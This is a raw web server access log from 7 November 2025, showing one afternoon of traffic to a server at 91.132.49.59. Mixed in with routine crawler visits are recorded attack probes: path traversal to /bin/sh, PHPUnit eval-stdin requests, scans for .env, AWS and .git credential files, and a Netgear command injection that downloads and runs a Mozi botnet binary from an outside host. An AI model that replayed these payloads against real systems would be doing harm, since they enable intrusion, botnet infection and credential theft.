91.232.238.112 - - [07/Nov/2025:11:52:32 +0300] "GET / HTTP/1.0" 400 468
44.201.177.43 - - [07/Nov/2025:11:54:57 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:11:54:57 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:11:56:15 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:11:56:15 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
79.124.40.174 - - [07/Nov/2025:11:58:24 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
79.124.40.174 - - [07/Nov/2025:11:58:24 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
91.232.238.112 - - [07/Nov/2025:12:00:14 +0300] "GET / HTTP/1.0" 302 119 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
44.201.177.43 - - [07/Nov/2025:12:04:53 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:12:04:53 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
91.232.238.112 - - [07/Nov/2025:12:05:44 +0300] "GET /robots.txt HTTP/1.1" 404 298 "-" "Mozilla/5.0"
91.232.238.112 - - [07/Nov/2025:12:05:44 +0300] "GET /robots.txt HTTP/1.1" 404 299
82.66.241.245 - - [07/Nov/2025:12:07:18 +0300] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 329
193.142.147.209 - - [07/Nov/2025:12:07:57 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 298 "-" "-"
204.76.203.219 - - [07/Nov/2025:12:10:09 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
79.124.40.174 - - [07/Nov/2025:12:11:39 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
79.124.40.174 - - [07/Nov/2025:12:11:39 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
49.51.47.100 - - [07/Nov/2025:12:16:18 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
49.51.47.100 - - [07/Nov/2025:12:16:19 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
79.124.40.174 - - [07/Nov/2025:12:16:55 +0300] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
44.201.177.43 - - [07/Nov/2025:12:17:01 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:12:17:02 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:12:18:24 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:12:18:25 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:12:25:55 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:12:25:56 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
20.64.104.155 - - [07/Nov/2025:12:26:36 +0300] "GET /developmentserver/metadatauploader HTTP/1.1" 404 298 "-" "Mozilla/5.0 zgrab/0.x"
193.142.147.209 - - [07/Nov/2025:12:27:20 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 299
79.124.40.174 - - [07/Nov/2025:12:35:09 +0300] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
3.145.49.236 - - [07/Nov/2025:12:35:10 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:12:35:11 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:12:40:31 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:12:40:31 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:12:41:11 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:12:41:11 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.30 - - [07/Nov/2025:12:44:42 +0300] "GET /.env HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.0.15) Gecko/2009101601 Firefox 2.1 (.NET CLR 3.5.30729)"
204.76.203.30 - - [07/Nov/2025:12:44:42 +0300] "GET /labs/aws.config HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.76.203.30 - - [07/Nov/2025:12:44:42 +0300] "GET /.aws/dev/config HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:17.0) Gecko/20100101 Firefox/17.0"
204.76.203.30 - - [07/Nov/2025:12:44:43 +0300] "GET /logs/awstats.pl HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_5; en-us) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.12"
204.76.203.30 - - [07/Nov/2025:12:44:44 +0300] "GET /.aws/config.bak HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Mobile; OPENC; rv:44.0) Gecko/44.0 Firefox/44.0"
204.76.203.30 - - [07/Nov/2025:12:44:45 +0300] "GET /backup/aws.json HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Linux; U; Android 2.3.6; vi-vn; GT-S5360 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
204.76.203.30 - - [07/Nov/2025:12:44:46 +0300] "GET /.aws/config.ini HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36"
204.76.203.30 - - [07/Nov/2025:12:44:46 +0300] "GET /server/.env.dev HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre"
204.76.203.30 - - [07/Nov/2025:12:44:46 +0300] "GET /tmp/config/.env HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Opera 7.23 [en]"
44.201.177.43 - - [07/Nov/2025:12:46:07 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:12:46:07 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
43.135.136.181 - - [07/Nov/2025:12:46:20 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.135.136.181 - - [07/Nov/2025:12:46:20 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
3.145.49.236 - - [07/Nov/2025:12:47:47 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:12:47:47 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
198.235.24.255 - - [07/Nov/2025:12:53:41 +0300] "\x16\x03\x01" 400 325 "-" "-"
198.235.24.255 - - [07/Nov/2025:12:53:42 +0300] "\x16\x03\x01" 400 325 "-" "-"
79.124.40.174 - - [07/Nov/2025:12:56:08 +0300] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
3.145.49.236 - - [07/Nov/2025:13:03:13 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:13:03:14 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
35.236.51.192 - - [07/Nov/2025:13:04:51 +0300] "GET /admin/config.php HTTP/1.1" 404 298 "-" "xfa1"
79.124.40.174 - - [07/Nov/2025:13:08:49 +0300] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
204.76.203.212 - - [07/Nov/2025:13:09:47 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.145.49.236 - - [07/Nov/2025:13:12:00 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:13:12:00 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:13:14:59 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:13:14:59 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.143.33.63 - - [07/Nov/2025:13:16:44 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.143.33.63 - - [07/Nov/2025:13:17:20 +0300] "\x16\x03\x01" 400 325 "-" "-"
3.143.33.63 - - [07/Nov/2025:13:17:25 +0300] "SSH-2.0-Go" 400 325 "-" "-"
79.124.40.174 - - [07/Nov/2025:13:18:25 +0300] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
79.124.40.174 - - [07/Nov/2025:13:18:25 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
3.143.33.63 - - [07/Nov/2025:13:20:17 +0300] "\n" 400 325 "-" "-"
162.216.149.174 - - [07/Nov/2025:13:22:33 +0300] "GET / HTTP/1.1" 302 - "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
162.216.149.174 - - [07/Nov/2025:13:22:34 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80/" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
172.202.117.213 - - [07/Nov/2025:13:23:06 +0300] "GET /owa/auth/logon.aspx HTTP/1.1" 404 299
3.145.49.236 - - [07/Nov/2025:13:24:35 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:13:24:35 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
35.236.51.192 - - [07/Nov/2025:13:27:27 +0300] "GET /admin/config.php HTTP/1.1" 404 299
34.247.51.117 - - [07/Nov/2025:13:28:05 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
34.247.51.117 - - [07/Nov/2025:13:28:05 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
185.170.144.3 - - [07/Nov/2025:13:28:42 +0300] "\x03" 400 325 "-" "-"
3.145.49.236 - - [07/Nov/2025:13:32:21 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:13:32:21 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:13:32:32 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:13:32:32 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
178.128.234.71 - - [07/Nov/2025:13:38:07 +0300] "\x16\x03\x01" 400 325 "-" "-"
178.128.234.71 - - [07/Nov/2025:13:38:07 +0300] "\x16\x03\x01" 400 325 "-" "-"
178.128.234.71 - - [07/Nov/2025:13:38:08 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.234.71 - - [07/Nov/2025:13:38:08 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.234.71 - - [07/Nov/2025:13:38:08 +0300] "GET /form.html HTTP/1.1" 404 298 "-" "curl/8.1.2"
178.128.234.71 - - [07/Nov/2025:13:38:08 +0300] "GET /upl.php HTTP/1.1" 404 298 "-" "Mozilla/5.0"
178.128.234.71 - - [07/Nov/2025:13:38:09 +0300] "GET /t4 HTTP/1.1" 404 298 "-" "Mozilla/5.0"
178.128.234.71 - - [07/Nov/2025:13:38:09 +0300] "GET /geoip/ HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.234.71 - - [07/Nov/2025:13:38:09 +0300] "GET /favicon.ico HTTP/1.1" 200 30894 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.234.71 - - [07/Nov/2025:13:38:10 +0300] "GET /1.php HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.234.71 - - [07/Nov/2025:13:38:10 +0300] "GET /systembc/password.php HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.234.71 - - [07/Nov/2025:13:38:10 +0300] "GET /password.php HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
44.201.177.43 - - [07/Nov/2025:13:40:13 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:13:40:13 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
83.192.53.2 - - [07/Nov/2025:13:42:51 +0300] "GET /phpMyAdmin-5.2/index.php?lang=en HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
83.192.53.2 - - [07/Nov/2025:13:42:51 +0300] "GET /phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
83.192.53.2 - - [07/Nov/2025:13:42:51 +0300] "GET /db/webdb/index.php?lang=en HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
172.210.68.2 - - [07/Nov/2025:13:43:20 +0300] "GET /ReportServer HTTP/1.1" 404 299
35.236.51.192 - - [07/Nov/2025:13:46:52 +0300] "GET /robots.txt HTTP/1.1" 404 298 "-" "Mozilla/5.0"
3.145.49.236 - - [07/Nov/2025:13:48:22 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:13:48:22 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:13:48:33 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:13:48:34 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
200.124.241.140 - - [07/Nov/2025:13:49:35 +0300] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://200.124.241.140:60818/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 295 "-" "-"
44.201.177.43 - - [07/Nov/2025:13:51:07 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:13:51:07 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
79.124.40.174 - - [07/Nov/2025:13:53:07 +0300] "GET /console/ HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
35.236.51.192 - - [07/Nov/2025:13:53:45 +0300] "GET /robots.txt HTTP/1.1" 404 299
205.210.31.183 - - [07/Nov/2025:13:54:02 +0300] "GET / HTTP/1.1" 302 - "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
205.210.31.183 - - [07/Nov/2025:13:54:02 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80/" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
3.146.107.169 - - [07/Nov/2025:13:55:34 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:13:55:34 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:14:00:36 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:14:00:37 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
79.124.40.174 - - [07/Nov/2025:14:02:58 +0300] "GET /_ignition/execute-solution HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
79.124.40.174 - - [07/Nov/2025:14:15:21 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
79.124.40.174 - - [07/Nov/2025:14:15:21 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
44.201.177.43 - - [07/Nov/2025:14:16:18 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:14:16:19 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
43.133.69.37 - - [07/Nov/2025:14:18:35 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.133.69.37 - - [07/Nov/2025:14:18:36 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.219 - - [07/Nov/2025:14:20:32 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.247.51.117 - - [07/Nov/2025:14:21:10 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
34.247.51.117 - - [07/Nov/2025:14:21:10 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
193.142.147.209 - - [07/Nov/2025:14:29:02 +0300] "GET / HTTP/1.1" 302 - "-" "-"
79.124.40.174 - - [07/Nov/2025:14:29:41 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
79.124.40.174 - - [07/Nov/2025:14:29:41 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
44.201.177.43 - - [07/Nov/2025:14:30:12 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:14:30:12 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
196.251.87.200 - - [07/Nov/2025:14:30:44 +0300] "GET /.git/config HTTP/1.1" 404 299
3.145.49.236 - - [07/Nov/2025:14:37:20 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:14:37:20 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:14:41:39 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:14:41:40 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
79.124.40.174 - - [07/Nov/2025:14:47:49 +0300] "GET /actuator/gateway/routes HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
44.201.177.43 - - [07/Nov/2025:14:57:01 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:14:57:01 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
49.51.196.42 - - [07/Nov/2025:15:00:25 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
49.51.196.42 - - [07/Nov/2025:15:00:27 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91-132-49-059.cprapid.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
79.124.40.174 - - [07/Nov/2025:15:07:33 +0300] "GET /geoserver HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
3.146.107.169 - - [07/Nov/2025:15:07:41 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:15:07:41 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
178.128.78.154 - - [07/Nov/2025:15:07:58 +0300] "GET /.env HTTP/1.1" 404 299
178.128.78.154 - - [07/Nov/2025:15:07:58 +0300] "GET / HTTP/1.0" 400 468
178.128.78.154 - - [07/Nov/2025:15:07:59 +0300] "GET /.git/config HTTP/1.1" 404 299
178.128.78.154 - - [07/Nov/2025:15:08:00 +0300] "GET / HTTP/1.0" 400 468
3.145.49.236 - - [07/Nov/2025:15:15:00 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:15:15:00 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:15:23:53 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:15:23:53 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:15:24:28 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:15:24:28 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
79.124.40.174 - - [07/Nov/2025:15:37:56 +0300] "\x16\x03\x01\x05\xa8\x01" 400 325 "-" "-"
204.76.203.30 - - [07/Nov/2025:15:41:22 +0300] "GET /.env HTTP/1.1" 404 299
204.76.203.30 - - [07/Nov/2025:15:41:23 +0300] "GET /labs/aws.config HTTP/1.1" 404 299
204.76.203.30 - - [07/Nov/2025:15:41:24 +0300] "GET /.aws/dev/config HTTP/1.1" 404 299
204.76.203.30 - - [07/Nov/2025:15:41:25 +0300] "GET /logs/awstats.pl HTTP/1.1" 404 299
204.76.203.30 - - [07/Nov/2025:15:41:27 +0300] "GET /.aws/config.bak HTTP/1.1" 404 299
204.76.203.30 - - [07/Nov/2025:15:41:28 +0300] "GET /backup/aws.json HTTP/1.1" 404 299
204.76.203.30 - - [07/Nov/2025:15:41:30 +0300] "GET /.aws/config.ini HTTP/1.1" 404 299
204.76.203.30 - - [07/Nov/2025:15:41:32 +0300] "GET /server/.env.dev HTTP/1.1" 404 299
204.76.203.30 - - [07/Nov/2025:15:41:35 +0300] "GET /tmp/config/.env HTTP/1.1" 404 299
204.76.203.30 - - [07/Nov/2025:15:41:37 +0300] "GET /symfony/env.yml HTTP/1.1" 404 299
3.145.49.236 - - [07/Nov/2025:15:41:38 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
